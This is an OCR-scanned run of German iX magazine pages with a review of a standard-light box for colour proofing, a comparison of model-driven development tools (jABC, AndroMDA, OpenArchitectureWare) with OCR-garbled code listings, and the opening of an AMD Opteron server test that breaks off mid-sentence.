Einrichtung von Offset-Druckmaschi- 
nen in Druckereien. 


Zwei auf einen Streich 


Einen Schritt in Richtung einer besse- 
ren Vorhersehbarkeit des Druckergeb- 
nisses geht jetzt die deutsche Just 


Normlicht GmbH, ein Anbieter von 
normkonformen Beleuchtungssystemen 
für die Farbabmusterung von Druckwer- 
ken, mit der neuen Normlichtbox Color 
Communicator2. Eine USB-Schnittstel- 
le erlaubt erstmals den Anschluss an 
PCs und damit die Einbindung in den 
Kalibrierungs-Workflow. 

Die äußeren Abmessungen des Ge- 
rätes betragen 64 x 63 x 47 cm, die 
Vorlagenfläche von 50 x 50 cm ist neu- 
tral grau eingefärbt. Für die gleichmä- 
Bige, reflexarme Ausleuchtung sorgen 
zwei 18 Watt starke Normlicht-Leucht- 
stoffröhren mit speziellen Streuschei- 
ben oberhalb und unterhalb der Be- 
trachtungsfläche. 

Als Besonderheit verfügt der Color 
Communicator2 zusätzlich über einen 
elektronischen Dimmer, der sich nicht 
nur über ein kleines Bedienfeld an der 
Gerätefront einstellen, sondern auch 
über eine USB-Schnittstelle von einem 
PC aus fernsteuern lässt. Darüber ist 
der Color Communicator? in ein Soft- 
waresystem zur Monitorkalibrierung 
eingebunden, wobei man die Beleuch- 
tungsstärke auf der Vorlagenfläche mit 
demselben Sensor misst, den man zur 
Kalibrierung des Monitors benutzt. Die 
Software „Adjust Monitor Calibration“ 
kann mit den gängigen Farbsensoren für 
Monitorkalibrierung arbeiten, die viel- 
leicht ohnehin schon im Einsatz sind. 
Für den Test musste die Normlichtbox 
mit dem Samsung XL24 mit LED- 
Backlight und dem zu diesem Monitor 
mitgelieferten Farbsensor xRite Eye- 
One Display 2 zusammenarbeiten. 

Für die Abstimmung des Color 
Communicator? auf den verwendeten 
Monitor kalibriert man zunächst den 
Monitor mit der Adjust Monitor Cali- 
bration. Dazu stellt die Software je 
nach Monitortyp passende Optionen 
bereit und kann den Nutzer zudem 
Schritt für Schritt durch den Abgleich- 


Hersteller: Just Normlicht GmbH, 
www.just-normlicht.de 


Preise: Normlichtbox Just Color 
Communicator? mit USB: 1490 Euro 

Software „Adjust Monitor Calibration“: 100 Euro 
Sensor: 199 Euro [alles netto] 


& integrierter Kalibriervorgang 


& vorhandene Farbsensoren nutzbar 
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prozess begleiten. Gehört der Monitor 
nicht zu den von der Software unter- 
stützten hardwarekalibrierbaren Moni- 
toren, führt sie eine Softwarekalibrie- 
rung durch. Sie modifiziert über eine 
aus dem Kalibriervorgang ermittelte 
Tabelle oder Matrix die zur Grafikkar- 
te geschickten Daten, sodass im Er- 
gebnis der Monitor die gewünschte 
Charakteristik bei der Helligkeits- und 
Farbwiedergabe bekommt. Da eine Soft- 
ware-Kalibrierung immer den nutzbaren 
Wertebereich der Videodaten redu- 
ziert, funktioniert sie am besten, wenn 
man den Monitor vorher so gut wie 
möglich auf die gewünschte Charakte- 
ristik einstellt. Mithilfe der Software 
kann die Anwenderin die Soll-Leucht- 
dichte des Monitors vorgeben, einstel- 
len und per Messung verifizieren. 


Ein ungleiches Paar 


Mit diesen Werten kann die Software 
nun den Dimmer des Color Communi- 
cator2 so einstellen, dass sich bei ei- 
ner ideal diffus reflektierenden, weißen 
Vorlage dieselbe scheinbare Leucht- 
dichte einstellt. Das Papierbild erscheint 
nach der Kalibrierung des Gesamtsys- 
tems also genauso hell wie das Monitor- 
bild und sieht unter ebenso definierten 
Betrachtungsbedingungen genauso aus 
wie dieses — einen dafür tauglichen Mo- 
nitor vorausgesetzt. Monitore für solche 
Zwecke - so auch der Samsung XL24 - 
liefern Anbieter in der Regel mit mon- 
tierbaren Fremdlichtblenden, die Umge- 
bungslichteinfall auf die Bildfläche 
weitgehend verhindern sollen. 

In der Praxis funktioniert der Moni- 
torabgleich schnell und komplikations- 
frei, ebenso die automatische Anpas- 
sung der Beleuchtungsstärke im Color 
Communicator2. Während sich beim 
Monitor neben der Helligkeit je nach 
Kalibrierparameter auch die Farbtem- 
peratur verändern lässt, ist beim Color 
Communicator? „nur“ die Helligkeit 


Farbtemperatur 


Wie der menschliche Gesichtssinn Farben 
wahrnimmt, hängt von den Betrachtungs- 
bedingungen ab. Beispielsweise hat das 
Umgebungslicht einen merklichen Ein- 
fluss darauf, was als „weiß“ gilt. Solange 
es sich um einigermaßen glühlichtähnliche 
Lichtquellen (Temperaturstrahler) handelt, 
ist die sogenannte Farbtemperatur ein be- 
währtes Mittel, die Farbcharakteristik von 
Lichtquellen zu beschreiben. Sie gibt die 
Temperatur desjenigen Temperaturstrah- 
lers an, dessen Licht die ähnlichste Farbe 
aufweist. 


Beispielsweise hat normales Glühlampen- 
licht eine Farbtemperatur von etwa 2700 K 


einstellbar, da die Farbtemperatur durch 
die verwendeten Leuchtstoffröhren ent- 
sprechend den einschlägigen Normen 
für die Druckvorstufe auf 5000 K fest- 
gelegt ist. 

Das mag zunächst nach einem Wi- 
derspruch klingen, denn in einem kali- 
brierten System müsste auch die Farb- 
temperatur des Monitors auf 5000 K 
festgelegt sein, um mit der Normlicht- 
box vergleichbar zu sein. Dieser Gedan- 
kengang berücksichtigt allerdings nicht 
die menschliche Wahrnehmung, denn 
es soll ja nicht die Farbtemperatur der 
Lichtquellen gleich sein, sondern die 
Wahrnehmung der Farbe „Weiß“ in bei- 
den Systemen. Beim Monitor bedeutet 
dies, dass dessen Farbwiedergabe auf 
die durchschnittliche Farbcharakteristik 
des Umgebungslichts abgestimmt sein 
sollte, also bei Tageslicht auf einen 
Wert, der eher bei 6500 K liegt. Ist der 
Monitor in ECIRGB [1] kalibriert, be- 
trägt die Ziel-Farbtemperatur 5800 K. 

In der Tat wirkt das Monitorbild bei 
einer probeweisen Kalibrierung auf 
5000 K im direkten Vergleich mit ei- 
nem Referenzdruck im Color Commu- 
nicator2 etwas zu rötlich. Bei korrekter 
Kalibrierung des Monitors verschwindet 
dieser Unterschied jedoch. Eine Über- 


ermöglichen. 


A-TRACT 


© Eine Monitorkalibrierung soll eine definierte Farb- und Helligkeitswiedergabe 
und somit einen „Soft-Proof”, also eine realitätsnahe Vorschau des Druckergebnisses 


@ Für einen Vergleich zwischen Monitorbild und Druck sind definierte Betrachtungs- 
bedingungen für beide Ausgabegeräte erforderlich. 


© Der Just Color Communicator2 schafft definierte Betrachtungsbedingungen 
und kann gleichzeitig per Software auf die Monitorkalibrierung abgestimmt werden, 
sodass sich eine bestmögliche Übereinstimmung erzielen lässt. 
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(2000 bis 3000 Kelvin), während die Farb- 
temperatur von normalem Tageslicht von 
5000 K bis 8000 oder 9000 K und mehr 
variieren kann, je nachdem, ob eine direk- 
te Sonneneinstrahlung vorliegt oder das 
Licht etwa durch einen bedeckten Himmel 
und die damit verbundene Lichtstreuung 
einen stärkeren Blauanteil bekommt. Die 
Farbtemperatur von direktem Sonnenlicht 
entspricht etwa der Temperatur der Son- 
nenoberfläche und hat mithin einen Wert 
von ungefähr 6500 K, der auch bei Moni- 
toren meist einstellbar ist. Das ans Tages- 
licht angepasste Auge sieht dann das 
6500 K warme Monitorweiß als weiß und 
nicht als farbstichig. 


prüfung der kalibrierten Leuchtdichten 
von Monitor und Color Communicator2 
mit einem 1°-Spot-Leuchtdichtemess- 
gerät Konica Minolta CS-100 ergibt ei- 
ne Übereinstimmung im Rahmen der 
Messgenauigkeit des für die Kalibrie- 
rung verwendeten Farbsensors. 


Fazit 


Bei korrekt eingestelltem Farbprofil für 
den Soft-Proof auf dem Monitor in ei- 
nem geeigneten Anzeigeprogramm er- 
gibt sich mit einem farbverbindlichen 
Referenzdruck eine sehr gute Überein- 
stimmung zwischen Monitorbild und 
Druckwerk. Auch wenn ein selbstleuch- 
tender Monitor nie ganz denselben vi- 
suellen Eindruck vermittelt wie ein 
Papierausdruck, ist der Just Color Com- 
municator2 ein deutlicher Schritt in 
Richtung einer weitgehenden Überein- 
stimmung zwischen Papier- und Mo- 
nitorbild. Die Einbeziehung der Norm- 
lichtbox-Kalibrierung bietet so die 
Möglichkeit, eine definierte Bezie- 
hung zwischen Soft-Proof und Aus- 
druck herzustellen und auf diese Weise 
auch Fehler in der Druckvorstufe und 
im Druckprozess aufzuspüren. (sun) 
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MDA-Werkzeuge 


odellgetriebene Softwareent- 
M wicklung oder Model Driven 

Software Development (MDSD) 
soll die Softwareentwicklung auf eine 
höhere Abstraktionsebene hieven, mit 
dem Resultat, dass der gesamte Prozess 
in großen Teilen automatisch abläuft 
und somit erheblich einfacher wird [1]. 
Dazu gehört die saubere Trennung der 
fachlichen und technischen Anteile ei- 
ner Anwendung. Mit der Model Dri- 
ven Architecture (MDA) hat die Object 
Management Group (OMG) den passen- 
den Standard geschaffen. AndroMDA 
und OpenArchitectureWare sind Open- 
Source-Werkzeuge, die diese Spezifi- 
kation umsetzen (siehe Kasten „Online- 
quellen“ oder iX-Link am Ende des 
Textes). Von JABC gibt es eine freie 
(aber nicht Open Source) sowie eine 
kommerzielle Ausprägung [2]. 


I jABC 3.6 


Das modulare Modellierungs-Frame- 
work JABC von der Universität Dort- 
mund hilft beim Erstellen beliebiger 
heterogener Softwaresysteme (Abbil- 
dung 1). Zudem soll es die berühmte 
Kluft zwischen Geschäft und IT schlie- 
Ben, denn hier modelliert der sogenannte 
Fachbenutzer (und nicht ein Program- 
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Eldar Sultanow 


Werkzeuge dafür. 


mierer) seine Anwendung mithilfe soge- 
nannter Service Independent Building 
Blocks (SIB). Es entstehen hierarchische 
Modelle. Dabei kommt die Bibliothek 
Jgraph zum Einsatz. Diese Arbeit erfor- 
dert keine konventionelle Kodierung. 

Was an echter Programmiertätigkeit 
anfällt, nämlich die Erstellung der 
grundlegenden SIBs, erledigt ein Java- 
Entwickler. Er kann dazu gewohnte 
Werkzeuge wie Netbeans oder Eclipse 
einsetzen. JABC liefert die notwendi- 
gen Funktionen zum Erstellen, Einrich- 
ten sowie für die Distribution der SIBs. 
Über die Revisionskontrollschicht lassen 
sich SIB-Klassen auch netzwerküber- 
greifend aus einem zentralen Repository 
mit Versionskontrolle und Zugriffs- 
rechten laden. 

JABC basiert auf dem leichtgewich- 
tigen Modellierungsprozess XMDD 
(eXtreme Model Driven Development) 
und setzt sich aus mehreren Teilen zu- 
sammen. In einer Baumansicht zeigt der 
Projekt- und Taxonomie-Browser die 
Projekte und zugehörigen SIBs an. Mo- 
delle speichert das Werkzeug in einem 
XML-Format, das die Struktur eines 
Graphen darstellt und Knoten mit Zu- 
satzinformationen (Labels) ergänzt. Die 
Parametrisierung von SIBs erfolgt mit 
dem SIB Inspector (Inspector Panel). 
Seine Modelle, sprich seine SIB-Gra- 


Im Vergleich: |ABC, AndroMDA und 
OpenArchitectureWare 


Software- 
aufomaten 


Jane Fröming, Norbert Gronau, 


Die-IT-Branche hat ein großes Ziel, nämlich die 
weitgehende Automatisierung beim Erstellen von 
Anwendungssystemen. Vielversprechende Ansätze liefert 
die modellgetriebene Softwareentwicklung. Im Umfeld 
freier Software findet der Interessierte etliche 


phen, kann der Fachmann mit ver- 
schiedenen Plug-ins erweitern. Bei- 
spielsweise könnte er eine Ausfüh- 
rungsschicht erzeugen, in der sich die 
Ergebnisse sofort testen lassen. Gängige 
Plug-ins sind der Tracer (für die Aus- 
führung der Modelle), der Model Che- 
cker sowie der Codegenerator Genesys. 
Jedes Plug-in hat seine eigenen Inspek- 
toren mit steuerbaren Funktionen, etwa 
GUI-Elemente wie Eigenschaftstabel- 
len, Menüeinträge oder Kontextmenüs. 

Genesys ist selbst mit JABC entwi- 
ckelt. Der Generator übersetzt die 
JABC-Modelle (inklusive einiger UML- 
Modellarten wie Activity Diagrams) 
via Maven (Build Tool) und Velocity 
(Template Engine) direkt in Java, 
BPEL (Business Process Execution 
Language) oder C++. Dieser Code ist 
sofort außerhalb von jABC ausführbar, 
der Build-Prozess allerdings unüber- 
sichtlich. Datenmodelle (zum Beispiel 
Entity-Relationship-Diagramme) so- 
wie das objektrelationale Mapping im- 
portiert oder definiert JABC über das 
DBSchema-Plug-in. JABC unterstützt 
somit Hibernate sowie jede JDBC- 
kompatible Datenbank. 

Für die Modellierung wählt jJABC 
einen generellen Ansatz — die SIBs. Da 
sich die, anders als UML-Modellele- 
mente, an den Fachanwender und nicht 
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an IT-Fachleute wenden, stand bei der 
Konstruktion des Werkzeugs die Be- 
dienbarkeit im Vordergrund, es wirkt 
wesentlich eleganter als die oft zu- 
sammengeschustert wirkenden Tools 
für Programmierer. SIBs lassen sich in 
Netbeans, Eclipse oder anderen IDEs 
erstellen und anschließend in JABC 
einbinden. Die meisten SIBs muss man 
nicht selbst programmieren, sondern 
importiert sie mit dem Web2SIB-Plug- 
in als Services, die in räumlich verteil- 
ten Projekten reichlich anfallen. Dabei 
ist es egal, ob es sich um SOAP-, 
REST-, CORBA- oder was auch immer 
für Komponenten handelt. JABC bietet 
zudem ein Plug-in zum Modellieren 
AndroMDA-kompatibler Modelle. 


A AndroMDA 3.2 


Der MDA-Generator AndroMDA ist in 
Java geschrieben, steht unter der BSD- 
Lizenz und entspricht funktional JABCs 
Genesys. Auf seiner Homepage liegt die 
Dokumentation, Support erhält man 
über ein Onlineforum. Automatisch 
mittels Maven erzeugt sind die Projekt- 
webseite sowie die Dokumentation — 
das heißt, Letztere hilft nicht wirklich 
weiter. Hier steckt der Teufel im Detail, 
zahlreiche kostspielige Seminarangebote 
versuchen daraus Kapital zu schlagen. 
Anders als beispielsweise JABC stellt 
das AndroMDA-Projekt weder eine IDE 
noch ein Modellierungstool zur Ver- 
fügung, sondern entwickelt lediglich den 
Generatorkern. Ausgangspunkte bei der 
Arbeit bilden UML-Modelle, in denen 
ein Modellierer die fachlichen Aspekte 
des Softwaresystems vollständig und 
formalisiert festlegt. Es entstehen dabei 
sogenannte Platform Independent Mo- 
dels (PIM, laut MDA-Spezifikation), 
die sich nicht mit Implementierungsde- 
tails befassen. Die PIMs überführt der 
Zuständige mit dem Model-to-Text- 
Übersetzer in Quellcode. Bei dieser 
Transformation entstehen aus den PIMs 
plattformspezifische Modelle (Imple- 
mentation Specific Models, ISM). Der 


‚Anwendungs- 


jABC 
experte 


SIB- 


Java IDE Ben 


| SIB-Klasse / Taxonomie-Browser 


Netbeans, Eclipse 
Tracer 


SIB Graph Canvas 


Modellierungsebene 


lokale Prüfung 
Modellprüfung 


Java Klassen-Browser 


SIB-Plugiin | *. 
SIB-Plug-in 


Implementierungsebene 


SCM-Integration 
Subversion 


ABC besteht aus drei Schichten: Auf der Modellierungsebene baut der 
Anwendungsexperte seine Programme selbst zusammen (Abb. 1). 


Generator lässt sich via OCL (Object 
Constraint Language) konfigurieren, 
was Modellvalidierungen ermöglicht. 
Das mitgelieferte Velocity verarbeitet die 
Vorlagen für die Codegenerierung. An- 
droMDA arbeitet mit den UML-Werk- 
zeugen Magicdraw, Poseidon UML, 
Sparx Enterprise Architect, MID Inno- 
vator sowie ArgoUML zusammen. 

In der Modellierung werden soge- 
nannte Stereotypen und Tagged Values 
(Eigenschaftswerte) verwendet, die 
Klassen, Attribute und Assoziationen 
kennzeichnen. Anhand der Stereotypen 
lassen sich die Modellelemente wäh- 
rend der Generierung getrennt verar- 
beiten. Beispielsweise kennzeichnet der 
Stereotyp Entity eine persistente Klasse. 
Tagged Values übernehmen die Fein- 
steuerung. Damit ließe sich etwa eine 
Operation, die zu einer mit Entity ge- 
kennzeichneten Klasse gehört, einer Da- 
tenbankabfrage zuordnen. 

Einfache Java-Klassen namens Meta- 
facades (kurz für Metamodel Facades) 
ermöglichen den Zugriff auf einzelne 
Modellelemente — insbesondere aus 
Velocity-Templates heraus. Sie basieren 
auf dem Facades-Softwareentwurfsmus- 
ter der „Gang of Four“ [3]. AndroMDA 
enthält Standardfassaden für UML-Mo- 
dellelemente wie Klassen und Attribu- 
te. Spezielle Ausprägungen liefert das 
Werkzeug in seinen Cartridges mit. 
Selbstredend kann man solche Zusatz- 
funktionen auch selbst schreiben. 

Herzstück des AndroMDA-Frame- 
work bilden die eben genannten Car- 


A-TRACT 


@ In der modellgetriebenen Softwareentwicklung erzeugt der Entwickler Sourcecode 
aus Modellen, die das spätere Softwaresystem komplett funktional beschreiben. 


© Bei der Codegenerierung können Generator-Frameworks wie die freien Vertreter 
jABC, AndroMDA und OpenArchitectureWare helfen. 


© Die betrachteten MDA-Systeme richten sich an unterschiedliche Zielgruppen: 
Fachanwender, Webprogrammierer sowie Eclipse-Entwickler. 
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tridges (Java-Archive). Dieses Plug- 
in-Konzept erlaubt es, mit Stereotypen 
gekennzeichnete Modellelemente ge- 
sondert zu verarbeiten. Zahlreiche vor- 
gefertigte Cartridges (JSF, Struts, JBoss 
BPM et cetera) gehören zum Liefer- 
umfang. Beispielsweise lassen sich mit 
andromda-bpm4struts-cartridge-3.3 .jar 
Struts-Webseiten aus UML-Modellen 
erzeugen. Durch Auswechseln der Car- 
tridges kann der Benutzer aus demsel- 
ben Modell Quellcode für verschiedene 
Plattformen erstellen. 

Letzteres erledigt er mit Apaches Ve- 
locity. Dabei kommt (theoretisch) ent- 
weder komplett maschinell produzierter 
Code heraus oder es entstehen Pro- 
grammrümpfe zum manuellen Nach- 
bearbeiten, was eher der Realität ent- 
spricht. Etliche Modellübersetzungen 
bringt AndroMDA von Haus aus mit. 
Darunter befinden sich solche für EJB, 
Hibernate, Java, XML Schema, JSF, 
Spring und Webservices. Außerdem 
gibt es externe Cartridges, die Code für 


Microsofts ‚Net Framework erzeugen. 
m OpenArchitecture- 
Ware 4.3 

Hinter der MDA-Plattform OpenAr- 
chitectureWare (oAW) stehen die 
deutschen Firmen Itemis und Gentle- 
ware. Das Projekt ist nach der EPL 
(Eclipse Public License) lizenziert und 
wird von einer großen Entwicklerge- 
meinde vorangetrieben. Im Gegensatz 
zu AndroMDA, das seine Stärke aus 
den zahlreichen vorgefertigten Modell- 
transformationen zieht, konzentriert sich 
oAW auf die Entwicklung eigener Um- 
wandlungsprozesse. Da sich das Tool in 
Eclipse einklinken lässt, profitiert der 
Programmierer vom Komfort der IDE. 
oAW ist in der Lage, beliebige Model- 
le zu verarbeiten. Das können EMF-Mo- 
delle (Eclipse Modelling Framework) 


sein, fast alle mit UML-Werkzeugen er- 
stellten (Magicdraw, Poseidon, Enter- 
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MDA-Werkzeuge 


prise Architect, Rose) oder auch sol- 
che aus Visio sowie textuelle Spezifi- 
kationen. Aus all diesen Quellen lässt 
sich plattformspezifischer Code generie- 
ren. Mit Eclipse kann der Entwickler 
domänenspezifische IDEs erstellen, bei- 
spielsweise für das Modellieren und Ge- 
nerieren von Handy-Programmen. 
oAW orientiert sich an der Arbeits- 
weise eines Fließbandes und ähnelt ei- 
nem Compiler. Die gut dokumentierte 
Plattform besteht aus einer in Java ge- 
schriebenen Workflow Engine, die drei 
Sprachen für unterschiedliche Einsatz- 
zwecke zur Verfügung stellt: Xtend ist 
eine funktionale Modelltransforma- 
tionssprache, Check das Äquivalent 
zur AndroMDAs OCL. Die statisch 
typisierte Template-Sprache Xpand 
unterstützt Template-Polymorphismus, 
-Aspekte sowie andere Eigenschaften, 
die man für das Schreiben von kom- 
plexen Codegeneratoren benötigt. Durch 
die drei Sprachen ist der Lernaufwand 
anfangs hoch. Bei oAW handelt es 
sich um ein auf Dependency Injection 
(DI) basierendes schlankes Komponen- 
ten-Framework. Es enthält Standard- 
komponenten wie Parser, Analyzer, 
Transformer, Sourcecode-Formatierun- 
gen („Beautification“), unterschiedli- 
che Modelle und vieles mehr (Abbil- 
dung 2). Die Workflow Engine kann die 
genannten Komponenten mit definierten 
Parametern und in vorgegebener Rei- 
henfolge aufrufen. Als Zwischener- 
gebnis entstehen dabei Abstract Syn- 
tax Graphs (ASG), die als Eingabe für 
weitere Module dienen. Wer eigene 
einbinden will, muss zunächst die in- 


m vow Wi .chk 


Workflow Engine 


Workflow- 
konfiguration 


Prüfungs- 
skripte 


Parser 


Listing 1 Listing 2 
<kRepository> . dfntity 
<körganization> public class Expert { 
sand. s<ftenn) private String nane; 
eproject>. „</project> private List skills; 
</körganization> private int rank; 
Expertise id="exp118142"> public Expert() { 
SIankanı TOR RN setllane("Petra"); 
ana setRank(3); 
<expert>Klausc/expert> setSkills(Arrays.asList(new StringLl{"J2EE" "PHP" ,"Latex"})); 
<skillonysals/skill> } 
<skill>Hibernates/skill> 
sskillöLatexe/skill> public String getNane() { return nane; } 
Aeirtse Ketapl209 public void setNane(String name) { this.nane = nane; } 
N public int getRank() { return rank; } 
</ranking> public void setRank(int rank) € this.rank = rank; } 
<expert>Petras/expert> 
as A0neTolany(mappedßy="parent"‚fetch=FetchType.EAGER, cascade=CascadeType.ALL) 
£ 1 >PHP< > 
SHilltatersTekille public List getSkills() € return skills; } 
<IkExpertise> public void setSkills(List skills) { this.skills = skills; } 
</kRepository> } 
Der KMML-Code zum Aus dem KMML-Dokument generiert oAW 
Transformationsprozess Instanzen für das O/R-Mapping auf eine Skill- 
in Abbildung 3 Datenbank. 


terne Schnittstelle org.openarchitecture- 
ware .workflow.WorkflowComponent im- 
plementieren. 

Beim Entwickeln eines Generators 
definiert der Programmierer das Meta- 
modell der betreffenden Domain, 
schreibt Templates und prüft, ob die 
Modelle korrekt verarbeitet werden. 
Einrichten muss er das Metamodell in 
Form von Java-Klassen, die sich mittels 
Eclipse JDT (Java Development Tools) 
implementieren lassen. Damit erhält er 
Funktionen wie Cross-Referenzierungen 
und Autovervollständigung. 

Nach Anstoß des Generierens (übli- 
cherweise per Ant-Skript) lassen sich 


Transforma- N pt Xpand- A R 
. xt a) 
tionsregeln Templates 


Generator 


Abstract Syntax Graph ) 


(€ (UML) Modell 


( Abstract Syntax Graph ) Modell oder Code )) 


OpenArchitecture verarbeitet beliebige Modelle und bietet ein Entwicklungs- 
framework für die Erstellung komplexer Codegeneratoren (Abb. 2). 


ABC 

Eclipse-Integration ja 

Plug-in-Support ja 

0/R-Mapping EIB 3.0 
Docbook-Support ja 

UML-Support einige Modellarten 
Modellvalidierung ja 
Sourcecode-Management ja 
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AndroMDA oAW 

in Arbeit ja 

ja ja 

EB 3.0 EB 3.0 

ja ja 

ja ja 

via Metafacades (nur UML) programmierbar 
nein nein 


verschiedene weitere Aspekte in der 
Eclipse-Workbench anzeigen. Dazu ge- 
hören Fehler, Warnungen und Tipps, 
die während der Modellverifikation auf- 
treten. Weiterhin kann man das gesamte 
Modell in einer Baumstruktur betrach- 
ten - inklusive aller Properties der Mo- 
dellelemente. Ebenso zu sehen sind der 
Callstack der Templates sowie die ein- 
zelnen Modellelemente. 

Ein kleines praktisches Beispiel: 
oAW lässt sich in den K-Modeler inte- 
grieren, ein Eclipse-basiertes Werkzeug 
zur Modellierung wissensintensiver Ge- 
schäftsprozesse [4] (Abbildung 3). Zum 
Austausch seiner Modelldaten exportiert 
der K-Modeler sie in ein XML-Format 
namens KMML (Knowledge Modeling 
Markup Language). oAW wandelt das 
KMML-Dokument (Listing 1) dann in 
eine technische Beschreibung (BPMN, 
BPEL) oder in Java-Code (Listing 2) 
um. Im Beispiel enthält der Java-Code 
persistente Klassen (Entitätsklassen) für 
den Zugriff auf eine Skill-Datenbank, in 
der Informationen zu den Kernkom- 
petenzen der Angestellten eines Unter- 
nehmens stehen. Solche Datenbanken 
spielen in räumlich verteilten Projekten 
eine wichtige Rolle. Transformationen 
in Docbook/XML für das automatisierte 
Erstellen von Dokumentationen und 
Reports sind ebenfalls möglich. 


Fazit 

Die Tabelle „Werkzeuge im Überblick“ 
zeigt die wichtigsten Merkmale der be- 
trachteten MDA-Tools. Ihre Einsatz- 
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zwecke sind durchaus unterschiedlich. 
Wer Software mittleren bis großen Um- 
fangs entwickelt, deren Schwerpunkt 
auf Integration liegt, sollte sich JABC 
näher anschauen. Das Werkzeug kann 
beim Aufbau einer serviceorientierten 
Architektur helfen und eignet sich auch 
für große sowie für internationale Pro- 
jekte. Es richtet sich an den Anwender 
aus der Fachabteilung, der seine Pro- 
gramme aus implementierungsunab- 
hängigen Bausteinen weitgehend selbst 
zusammenbaut. jJABC schafft es, den 
anfangs dargestellten Leitgedanken von 
MDA umzusetzen: die Codeerzeugung 
aus Modellen, vorrangig von der Fach- 
abteilung aufgebaut. 

Für Webentwickler, die in überschau- 
baren JEE-Projekten Anwendungen aus 
Modellen generieren wollen, dürfte in 
erster Linie AndroMDA interessant 
sein. Für die Komponentengenerierung 
stellt die Software etliche vorgefertigte 
Cartridges bereit. Die Modellierung er- 
folgt mit externen UML-Werkzeugen. 
AndroMDA ist ein reiner Codegenera- 
tor. Um Modellierung, Modellüberprü- 
fung et cetera kümmert er sich nicht. 
Dem MDA-Leitbild genügt das Werk- 
zeug nicht, denn das Erstellen von 
UML-Modellen und das Anreichern 
um Implementierungsdetails erfordert 
fundierte Modellierungs- und Program- 
mierkenntnisse. 

Eclipse-Entwickler dürften sich mit 
OpenArchitectureWare am wohlsten 
fühlen, denn die Software lässt sich in 
die beliebte IDE integrieren. Mit dieser 
Werkzeugkombination lassen sich Mo- 
dellierungs-, Programmier- und Simu- 
lationsprogramme für unterschiedliche 
Plattformen erstellen — auch über den 
JEE-Bereich hinaus, beispielsweise für 
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Handy-Anwendungen. Insofern folgt 
oAW dem MDA-Paradigma, denn der 
Entwickler kann Rich-Client-Applika- 
tionen für den Fachanwender bauen, 
mit denen Letzterer wiederum Model- 
le für die Codeerzeugung erstellt. (jd) 
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Der Weg vom Modell zum Code: 

oAW wandelt KMML-Dokumente in 
technische Beschreibungen (BPMN, 
BPEL) oder Java-Code um (Abb. 3). 
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Ralph Hülsenbusch 


Ungewöhnlich lange war AMDs neuer Opteron „Barcelona” 
im Gespräch, denn schließlich hat es Monate gedauert, bis 
die Ingenieure den Prozessor von seinem Bug befreit hatten. 


ne neue Generation seiner Opteron- 

CPUs heraus, präsentiert in der Stadt, 
die als Formel-1-Austragungsort dem 
Projekt seinen Namen gab: Barcelona. 
Über ein halbes Jahr dauerte es, bis 
AMD im April 2008 die Auslieferung 
großer Stückzahlen wagen konnte. Der 
Grund: Im B1-Stepping hatte sich ein 
Fehler im Translation Lookaside Buf- 
fer (TLB) eingeschlichen. Als Über- 
gang lieferte AMD ein BIOS-Update, 
das den Bug umging, aber Performance 
kostete. Endgültig bereinigen konnte der 
Hersteller das Design erst mit dem B3- 
Stepping. Aussagekräftige Messungen 
verboten sich bis dahin. 

Gleich zwei Anbieter konnten Syste- 
me mit der CPU zum Test stellen: Dell 
seinen Poweredge T605, ein Zwei- 
sockelsystem, in dem aber nur einer mit 


N m September 2007 brachte AMD ei- 
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einem 2350 bestückt war, und CPI sei- 
nen 16-Kerner (vier 8350) Eagle 1413, 
den Nachfolger des Falcon 1413, der 
noch mit einem A-Stepping ins Haus 
gekommen war und in der März-Aus- 
gabe deshalb nur hinsichtlich seiner 
Skalierung auf den Prüfstand kam [1]. 
Die Barcelona-CPUs sind mit 2 GHz 
getaktet, besitzen 512 MByte L2-Cache 
pro Kern und einen gemeinsam genutz- 
ten 2 GByte großen L3-Cache. Der 
Hypertransport, die serielle Verbindung 
zwischen den Prozessoren und zur Pe- 
ripherie, ist mit 1 GHz getaktet. Die 
CPU-Chips stammen aus dem 65-nm- 
Prozess und brauchen jeweils 95 Watt. 

Wie üblich kam SPECs CPU2006 
zum Einsatz, und zwar sowohl unter 
Windows Server als auch unter Linux. 
Die Entwicklung der SSE4-Technik hat 
zur Inkompatibilität zwischen Intels 


und AMDs CPUs geführt. Deswegen 
sind die bei den SPEC-Messungen be- 
liebten Compiler von Intel nicht erste 
Wahl. Die Portland Group stellte dem 
iX-Labor freundlicherweise Lizenzen 
für ihre Compiler zur Verfügung. 
Außerdem bot sich die Gelegenheit, ei- 
nige Experimente mit SPECpower- 
ssj2008 durchzuführen. Zu guter Letzt 
läutete das Erscheinen der Version 1.1 
der CPU2006 kurz vor Abschluss der 
Tests eine Ehrenrunde ein. 


U CPls Eagle 1413 


Im Unterschied zum Falcon nutzt CPIs 
Eagle ein anderes Mainboard von Su- 
permiero mit den Chipsets Nvidia 
MCP55 Pro und AMD 8131, die sich 
mit ihrem BIOS-RAID (Soft-RAID) et- 
was zickig anstellen. Zwar kam das mit 
Windows Server 2003 in der 32-Bit- 
Version vorinstallierte System damit zu- 
recht, aber der erste Versuch, SLES10 
zu installieren, scheiterte: Suses Linux 
führte zwar die Installation durch, konn- 
te jedoch den Boot-Manager Grub nicht 
einrichten. 

Beim Auffrischen des Windows-Ser- 
vers auf 64 Bit, was bei 32 GByte 
Hauptspeicher durchaus angebracht ist, 
passte der Treiber für den RAID-Con- 
troller nicht mehr. CPI schickte zwar ei- 
nige Links zu Kompatibilitätslisten und 
Treibern, die aber schon älteren Datums 
(August 2007) und auf der mitgeliefer- 
ten CD zu finden waren. Es erwies sich 
letztendlich als einfacher — dem Rat vie- 
ler Foren folgend -, die RAID-Option 
im BIOS abzuschalten, da sie mit zwei 
Platten ohnehin nicht allzu viel bringt. 

CPI hatte zwei Seagate Barracuda 
ST375064NS (SATA, 7200 U/min) mit 
je 750 GByte eingebaut, der dritte Slot 
war frei. Im 1 U hohen Gehäuse blieb 
wegen des raumfüllenden Boards von 
Supermicro nur Platz für ein 1000- 
Watt-Netzteil — cold-swappable, wie es 
im Prospekt heißt: Es lässt sich nur bei 
gezogenem Netzstecker nach vorne 
herausziehen. Über die Festplatten pass- 
te noch ein DVD-Laufwerk. Fürs Netz 
ist der Server mit zwei Gigabit-Ether- 
net-Anschlüssen on-board bestückt. 
Das Management-Netz begnügt sich 
mit 100 MBit/s. 

Der Blick ins Innere des Quad-Quad 
von CPI (siehe Abbildung 1) fällt auf 
die für Opteron-Systeme typische Struk- 
tur: Memory-Riegel, die sich an CPUs 
kuscheln, davor in geschlossener Reihe 
die Lüfter, einzeln hot-swappable. Mit 
an Bord ein Management-Modul fürs 
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Out-of-Band-Netz, ein auch per Brow- 
